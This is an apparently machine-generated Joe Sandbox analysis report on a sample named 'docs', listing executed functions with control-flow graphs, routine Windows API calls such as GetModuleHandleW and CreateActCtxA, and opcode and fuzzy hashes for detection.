                                                                                                                                                                                                                      Execution Coverage:8.3%
                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                                                      Total number of Nodes:33
                                                                                                                                                                                                                      Total number of Limit Nodes:3
                                                                                                                                                                                                                      execution_graph 24016 13bd578 24017 13bd5be GetCurrentProcess 24016->24017 24019 13bd610 GetCurrentThread 24017->24019 24022 13bd609 24017->24022 24020 13bd64d GetCurrentProcess 24019->24020 24023 13bd646 24019->24023 24021 13bd683 24020->24021 24024 13bd6ab GetCurrentThreadId 24021->24024 24022->24019 24023->24020 24025 13bd6dc 24024->24025 24026 13bb1f8 24029 13bb2e1 24026->24029 24027 13bb207 24030 13bb301 24029->24030 24031 13bb324 24029->24031 24030->24031 24032 13bb528 GetModuleHandleW 24030->24032 24031->24027 24033 13bb555 24032->24033 24033->24027 24034 13b4960 24035 13b4972 24034->24035 24036 13b497e 24035->24036 24038 13b4a70 24035->24038 24039 13b4a95 24038->24039 24043 13b4b71 24039->24043 24047 13b4b80 24039->24047 24044 13b4ba7 24043->24044 24045 13b4c84 24044->24045 24051 13b480c 24044->24051 24049 13b4ba7 24047->24049 24048 13b4c84 24049->24048 24050 13b480c CreateActCtxA 24049->24050 24050->24048 24052 13b5c10 CreateActCtxA 24051->24052 24054 13b5cd3 24052->24054 24055 13bd7c0 DuplicateHandle 24056 13bd856 24055->24056

                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                      Function 0548FCD1 Relevance: 3.9, Strings: 3, Instructions: 152COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 44 548fcd1-548fcd8 45 548fcda-548fd02 44->45 46 548fd2d-548fd2e 44->46 50 548fd09-548fd27 45->50 51 548fd04 45->51 47 548fd2f-548fd34 46->47 49 548fd36-548fd52 47->49 52 548fd5b-548fd5c 49->52 53 548fd54 49->53 50->46 51->50 56 548fead-548feb6 52->56 59 548fd61-548fd85 52->59 53->47 54 548fe18-548fe3d 53->54 55 548fe69-548fea8 53->55 53->56 57 548fda0-548fdb2 53->57 58 548fdf0-548fe13 53->58 53->59 60 548fdb4-548fdcf 53->60 61 548fd87-548fd9e 53->61 67 548fe3f-548fe4e 54->67 68 548fe50-548fe57 54->68 55->49 57->49 58->49 59->49 71 548fdda-548fdeb 60->71 61->49 69 548fe5e-548fe64 67->69 68->69 69->49 71->49
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5480000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: '<"C$'<"C$NvTt
                                                                                                                                                                                                                      • API String ID: 0-1787953242
                                                                                                                                                                                                                      • Opcode ID: 3d6a078eca001017240311f1f6c9105d5912534625656a97e3602636ec01320d
                                                                                                                                                                                                                      • Instruction ID: ced4e91d36016e8840841328b10bd4ef57d6e5dfcc94649aba72759133865736
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d6a078eca001017240311f1f6c9105d5912534625656a97e3602636ec01320d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09512874E012099FCB18DFA9D5859EEFBF2FF88300F20942AE516A7354E7745A468F50
                                                                                                                                                                                                                      Function 0548FCE0 Relevance: 3.9, Strings: 3, Instructions: 143COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 72 548fce0-548fd02 73 548fd09-548fd2e 72->73 74 548fd04 72->74 76 548fd2f-548fd34 73->76 74->73 77 548fd36-548fd52 76->77 78 548fd5b-548fd5c 77->78 79 548fd54 77->79 82 548fead-548feb6 78->82 85 548fd61-548fd85 78->85 79->76 80 548fe18-548fe3d 79->80 81 548fe69-548fea8 79->81 79->82 83 548fda0-548fdb2 79->83 84 548fdf0-548fe13 79->84 79->85 86 548fdb4-548fdcf 79->86 87 548fd87-548fd9e 79->87 93 548fe3f-548fe4e 80->93 94 548fe50-548fe57 80->94 81->77 83->77 84->77 85->77 97 548fdda-548fdeb 86->97 87->77 95 548fe5e-548fe64 93->95 94->95 95->77 97->77
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5480000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: '<"C$'<"C$NvTt
                                                                                                                                                                                                                      • API String ID: 0-1787953242
                                                                                                                                                                                                                      • Opcode ID: 150fed47922cbc4ea94162344520d993b16d7feb4fba47f4e79eb15534d13bd4
                                                                                                                                                                                                                      • Instruction ID: 9e718bd6a9a71bd7695630fde570f338c8ad23a244d8d51efd2784a1327dfc27
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 150fed47922cbc4ea94162344520d993b16d7feb4fba47f4e79eb15534d13bd4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A51F774E01209DFCB18DFAAD5855EEFBF2BF88300F20982AE516A7354E7345A468F54
                                                                                                                                                                                                                      Function 0548D2E0 Relevance: .3, Instructions: 296COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 891 548d2e0-548d305 892 548d30c-548d329 891->892 893 548d307 891->893 894 548d331 892->894 893->892 895 548d338-548d354 894->895 896 548d35d-548d35e 895->896 897 548d356 895->897 907 548d363-548d36f 896->907 909 548d6f8-548d70b 896->909 897->894 898 548d688-548d6ad 897->898 899 548d628-548d62c 897->899 900 548d5e9-548d5ef 897->900 901 548d4ea-548d4ff 897->901 902 548d54b-548d55d 897->902 903 548d38d-548d399 897->903 904 548d46d-548d47a 897->904 905 548d60e-548d623 897->905 906 548d562-548d579 897->906 897->907 908 548d504-548d516 897->908 897->909 910 548d658-548d65c 897->910 911 548d598-548d5a4 897->911 912 548d499-548d4b0 897->912 913 548d41a-548d432 897->913 914 548d51b-548d51f 897->914 915 548d6dc-548d6f3 897->915 916 548d3de-548d3f0 897->916 917 548d47f-548d494 897->917 918 548d6b2-548d6be 897->918 919 548d4b5-548d4be 897->919 920 548d3f5-548d415 897->920 898->895 921 548d62e-548d63d 899->921 922 548d63f-548d646 899->922 947 548d5f7-548d609 900->947 901->895 902->895 929 548d39b 903->929 930 548d3a0-548d3b6 903->930 904->895 905->895 962 548d57b call 548d910 906->962 963 548d57b call 548d920 906->963 923 548d371 907->923 924 548d376-548d38b 907->924 908->895 925 548d65e-548d66d 910->925 926 548d66f-548d676 910->926 935 548d5ab-548d5c1 911->935 936 548d5a6 911->936 912->895 937 548d439-548d44f 913->937 938 548d434 913->938 933 548d521-548d530 914->933 934 548d532-548d539 914->934 915->895 916->895 917->895 931 548d6c0 918->931 932 548d6c5-548d6d7 918->932 927 548d4c0-548d4cf 919->927 928 548d4d1-548d4d8 919->928 920->895 939 548d64d-548d653 921->939 922->939 923->924 924->895 940 548d67d-548d683 925->940 926->940 941 548d4df-548d4e5 927->941 928->941 929->930 953 548d3b8 930->953 954 548d3bd-548d3d9 930->954 931->932 932->895 943 548d540-548d546 933->943 934->943 955 548d5c8-548d5e4 935->955 956 548d5c3 935->956 936->935 957 548d451 937->957 958 548d456-548d468 937->958 938->937 939->895 940->895 941->895 943->895 944 548d581-548d593 944->895 947->895 953->954 954->895 955->895 956->955 957->958 958->895 962->944 963->944
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5480000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 1de874fdf008eec0a59139614ff052465a9fd2bfdd0a5dc01b5b1b982d743462
                                                                                                                                                                                                                      • Instruction ID: 07c34c254706e82655f7eafa691fc3764fdfca51899f92b401230556bffc888d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1de874fdf008eec0a59139614ff052465a9fd2bfdd0a5dc01b5b1b982d743462
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 22D16970D1530ADFCB08DF99D5808EEFBB2FF89310B64955AD415AB294D734AA82CF90
                                                                                                                                                                                                                      Function 0548D2CA Relevance: .3, Instructions: 294COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 964 548d2ca-548d305 966 548d30c-548d329 964->966 967 548d307 964->967 968 548d331 966->968 967->966 969 548d338-548d354 968->969 970 548d35d-548d35e 969->970 971 548d356 969->971 981 548d363-548d36f 970->981 983 548d6f8-548d70b 970->983 971->968 972 548d688-548d6ad 971->972 973 548d628-548d62c 971->973 974 548d5e9-548d5ef 971->974 975 548d4ea-548d4ff 971->975 976 548d54b-548d55d 971->976 977 548d38d-548d399 971->977 978 548d46d-548d47a 971->978 979 548d60e-548d623 971->979 980 548d562-548d579 971->980 971->981 982 548d504-548d516 971->982 971->983 984 548d658-548d65c 971->984 985 548d598-548d5a4 971->985 986 548d499-548d4b0 971->986 987 548d41a-548d432 971->987 988 548d51b-548d51f 971->988 989 548d6dc-548d6f3 971->989 990 548d3de-548d3f0 971->990 991 548d47f-548d494 971->991 992 548d6b2-548d6be 971->992 993 548d4b5-548d4be 971->993 994 548d3f5-548d415 971->994 972->969 995 548d62e-548d63d 973->995 996 548d63f-548d646 973->996 1021 548d5f7-548d609 974->1021 975->969 976->969 1003 548d39b 977->1003 1004 548d3a0-548d3b6 977->1004 978->969 979->969 1036 548d57b call 548d910 980->1036 1037 548d57b call 548d920 980->1037 997 548d371 981->997 998 548d376-548d38b 981->998 982->969 999 548d65e-548d66d 984->999 1000 548d66f-548d676 984->1000 1009 548d5ab-548d5c1 985->1009 1010 548d5a6 985->1010 986->969 1011 548d439-548d44f 987->1011 1012 548d434 987->1012 1007 548d521-548d530 988->1007 1008 548d532-548d539 988->1008 989->969 990->969 991->969 1005 548d6c0 992->1005 1006 548d6c5-548d6d7 992->1006 1001 548d4c0-548d4cf 993->1001 1002 548d4d1-548d4d8 993->1002 994->969 1013 548d64d-548d653 995->1013 996->1013 997->998 998->969 1014 548d67d-548d683 999->1014 1000->1014 1015 548d4df-548d4e5 1001->1015 1002->1015 1003->1004 1027 548d3b8 1004->1027 1028 548d3bd-548d3d9 1004->1028 1005->1006 1006->969 1017 548d540-548d546 1007->1017 1008->1017 1029 548d5c8-548d5e4 1009->1029 1030 548d5c3 1009->1030 1010->1009 1031 548d451 1011->1031 1032 548d456-548d468 1011->1032 1012->1011 1013->969 1014->969 1015->969 1017->969 1018 548d581-548d593 1018->969 1021->969 1027->1028 1028->969 1029->969 1030->1029 1031->1032 1032->969 1036->1018 1037->1018
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5480000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 3b5e4716b6eb81177a3af1d8670f0a6dcb9b6f81ccd138413452af9495ab0fc2
                                                                                                                                                                                                                      • Instruction ID: f323c8418e765c64fdb4ea8cd23b269fe996fa2488f7bce84003e22a79b54e60
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b5e4716b6eb81177a3af1d8670f0a6dcb9b6f81ccd138413452af9495ab0fc2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1ED14770D1120ADFCB08DF99D5818EEFBB2FF89310B64955AD415AB294D734EA82CF90
                                                                                                                                                                                                                      Function 0548B218 Relevance: .2, Instructions: 192COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5480000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: e0b0159cbf981139ae5d297f030f1bc710104347f708070c19619364526ff951
                                                                                                                                                                                                                      • Instruction ID: 13e1a459def51910cc06fcb2d1193ed01ba7734fa6492065608736d150b7e0d5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e0b0159cbf981139ae5d297f030f1bc710104347f708070c19619364526ff951
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0381C374E002098FDB08DFAAC984AEEFBB2FF88300F24952AD515AB354DB355906CF54
                                                                                                                                                                                                                      Function 0548B228 Relevance: .2, Instructions: 189COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5480000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: a17a02b21587fe26ddc099154ad814028c12c79c58da5e31bf3325dfa75fbd63
                                                                                                                                                                                                                      • Instruction ID: 6fb918726ec7d75d1342d2bf1f8ad3add7cd615d23130cfe864ebeae8d093873
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a17a02b21587fe26ddc099154ad814028c12c79c58da5e31bf3325dfa75fbd63
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2981AF74E00619CFDB08DFAAC984AEEFBB2FF88300F24952AD515AB354DB355906CB50
                                                                                                                                                                                                                      Function 0548FA79 Relevance: .1, Instructions: 144COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5480000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: a300d55ebf82200660a2cc42398736e90f4ef1eb3c3e714584ef572fa19f05fe
                                                                                                                                                                                                                      • Instruction ID: b67f4f24a044d0e88c643334ad325174741a6de46984cfdfdbff9aacec5430a4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a300d55ebf82200660a2cc42398736e90f4ef1eb3c3e714584ef572fa19f05fe
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA511670E14209AFCB08DFA5D9859EEFBB2FF88310F10D46AE416E7254DB749A058F54
                                                                                                                                                                                                                      Function 0548FA88 Relevance: .1, Instructions: 139COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5480000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: fe56e515e1710ffaa7efc3757d4e91baa211ea512bd0310efe9596ef628a8416
                                                                                                                                                                                                                      • Instruction ID: 7506b8d58b9ad6aa140734b8898a83c5764c31c326a82d98714e6d7d3f2b1168
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe56e515e1710ffaa7efc3757d4e91baa211ea512bd0310efe9596ef628a8416
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CE511470E14209AFCB08DFA5D9855EEFBB2FF88310F10E46AE416E7254DB749A058F54
                                                                                                                                                                                                                      Function 0548C3E8 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5480000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: fc9e915960bffd98eaa95fd1a17be7fdd7c87556d45919908382a7ee4925028c
                                                                                                                                                                                                                      • Instruction ID: a1f6dd040adb21d0669ac3fa4c63846bce27541e1abdb695230024c301a61133
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fc9e915960bffd98eaa95fd1a17be7fdd7c87556d45919908382a7ee4925028c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E21EAB1E006588BEB18CFAAC9847DEBBF7AFC8300F14C16AD409A6354DB745949CF90
                                                                                                                                                                                                                      Function 0548C3F8 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5480000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: bcc4f98a4c84b2158e4f66653dca1bf490e3cb82c4c804abc4ab6abb9b55a284
                                                                                                                                                                                                                      • Instruction ID: efb0ee8c9c669438abc5abda11bedeb60f7ddc77fcf43d25bed401efd8adbd8e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bcc4f98a4c84b2158e4f66653dca1bf490e3cb82c4c804abc4ab6abb9b55a284
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C021D671E006188BEB18CFAAD9447DEFBF7AFC8310F14C16AD509A6354DB741A558F90
                                                                                                                                                                                                                      Function 013BD568 Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 013BD5F6
                                                                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 013BD633
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 013BD670
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 013BD6C9
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2158527518.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_13b0000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Current$ProcessThread
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2063062207-0
                                                                                                                                                                                                                      • Opcode ID: 9f36bbb88c969ff67054e2fd3bd648553ac496e8bcb2c8499258b37b5ae76806
                                                                                                                                                                                                                      • Instruction ID: bd352f5dbd040e9a723344f032d83d0b8a283a2d95c53780cbf108078276996c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f36bbb88c969ff67054e2fd3bd648553ac496e8bcb2c8499258b37b5ae76806
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 005166B090034A8FDB04CFA9D588BEEBBF1EF88318F208459D509A7260DBB55944CF25
                                                                                                                                                                                                                      Function 013BD578 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 013BD5F6
                                                                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 013BD633
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 013BD670
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 013BD6C9
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2158527518.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_13b0000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Current$ProcessThread
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2063062207-0
                                                                                                                                                                                                                      • Opcode ID: 050e5a0e6e0b6a51cb9b2b2ccc49b53787f2e36fcfbd987c0ff5546eaeafac23
                                                                                                                                                                                                                      • Instruction ID: 2257b6f36aa6399d228f86f5aa6dac121ab4c7146b7c3a52201e9bdadc8ad7b3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 050e5a0e6e0b6a51cb9b2b2ccc49b53787f2e36fcfbd987c0ff5546eaeafac23
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F5122B090024ACFDB54CFAAD588BDEBBF1AF88318F208459D509A7260DBB59944CB65
                                                                                                                                                                                                                      Function 013BB2E1 Relevance: 1.7, APIs: 1, Instructions: 202COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 98 13bb2e1-13bb2ff 99 13bb32b-13bb32f 98->99 100 13bb301-13bb30e call 13b8840 98->100 102 13bb343-13bb384 99->102 103 13bb331-13bb33b 99->103 106 13bb310 100->106 107 13bb324 100->107 109 13bb391-13bb39f 102->109 110 13bb386-13bb38e 102->110 103->102 155 13bb316 call 13bb579 106->155 156 13bb316 call 13bb588 106->156 107->99 111 13bb3c3-13bb3c5 109->111 112 13bb3a1-13bb3a6 109->112 110->109 117 13bb3c8-13bb3cf 111->117 114 13bb3a8-13bb3af call 13bacc4 112->114 115 13bb3b1 112->115 113 13bb31c-13bb31e 113->107 116 13bb460-13bb520 113->116 119 13bb3b3-13bb3c1 114->119 115->119 148 13bb528-13bb553 GetModuleHandleW 116->148 149 13bb522-13bb525 116->149 120 13bb3dc-13bb3e3 117->120 121 13bb3d1-13bb3d9 117->121 119->117 124 13bb3f0-13bb3f9 call 13bacd4 120->124 125 13bb3e5-13bb3ed 120->125 121->120 129 13bb3fb-13bb403 124->129 130 13bb406-13bb40b 124->130 125->124 129->130 131 13bb429-13bb42d 130->131 132 13bb40d-13bb414 130->132 153 13bb430 call 13bb888 131->153 154 13bb430 call 13bb860 131->154 132->131 134 13bb416-13bb426 call 13bace4 call 13bacf4 132->134 134->131 137 13bb433-13bb436 139 13bb459-13bb45f 137->139 140 13bb438-13bb456 137->140 140->139 150 13bb55c-13bb570 148->150 151 13bb555-13bb55b 148->151 149->148 151->150 153->137 154->137 155->113 156->113
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 013BB546
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2158527518.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_13b0000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HandleModule
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4139908857-0
                                                                                                                                                                                                                      • Opcode ID: 1af3cf111e6e80c9c59307679be72ed88ba5277c9bb8d1c8082480c991613a23
                                                                                                                                                                                                                      • Instruction ID: 5e800b5e01711ccc39970a24c71edff0a2edcb0f40e3081b6877ce97bec67b08
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1af3cf111e6e80c9c59307679be72ed88ba5277c9bb8d1c8082480c991613a23
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AC814870A00B458FDB25DF29D09479ABBF1FF88304F04892DD68AD7A54EB74E809CB91
                                                                                                                                                                                                                      Function 013B480C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 157 13b480c-13b5cd1 CreateActCtxA 160 13b5cda-13b5d34 157->160 161 13b5cd3-13b5cd9 157->161 168 13b5d43-13b5d47 160->168 169 13b5d36-13b5d39 160->169 161->160 170 13b5d49-13b5d55 168->170 171 13b5d58 168->171 169->168 170->171 173 13b5d59 171->173 173->173
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 013B5CC1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2158527518.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_13b0000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Create
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                                                                                                      • Opcode ID: e9d8bcfba162205ce16198aa92b2e3c505d1b89648ea9fbf6ff668c2579a2ceb
                                                                                                                                                                                                                      • Instruction ID: 9467985bf66f6c658a6fdba0bc29e16e2b56cdd94049ee88a0ff50c0296bebb1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e9d8bcfba162205ce16198aa92b2e3c505d1b89648ea9fbf6ff668c2579a2ceb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2441F1B0C0071DCBEB25DFA9C984BDEBBB5BF48704F20816AD508AB251DB756945CF90
                                                                                                                                                                                                                      Function 013B5C05 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 174 13b5c05-13b5cd1 CreateActCtxA 176 13b5cda-13b5d34 174->176 177 13b5cd3-13b5cd9 174->177 184 13b5d43-13b5d47 176->184 185 13b5d36-13b5d39 176->185 177->176 186 13b5d49-13b5d55 184->186 187 13b5d58 184->187 185->184 186->187 189 13b5d59 187->189 189->189
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 013B5CC1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2158527518.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_13b0000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Create
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2289755597-0
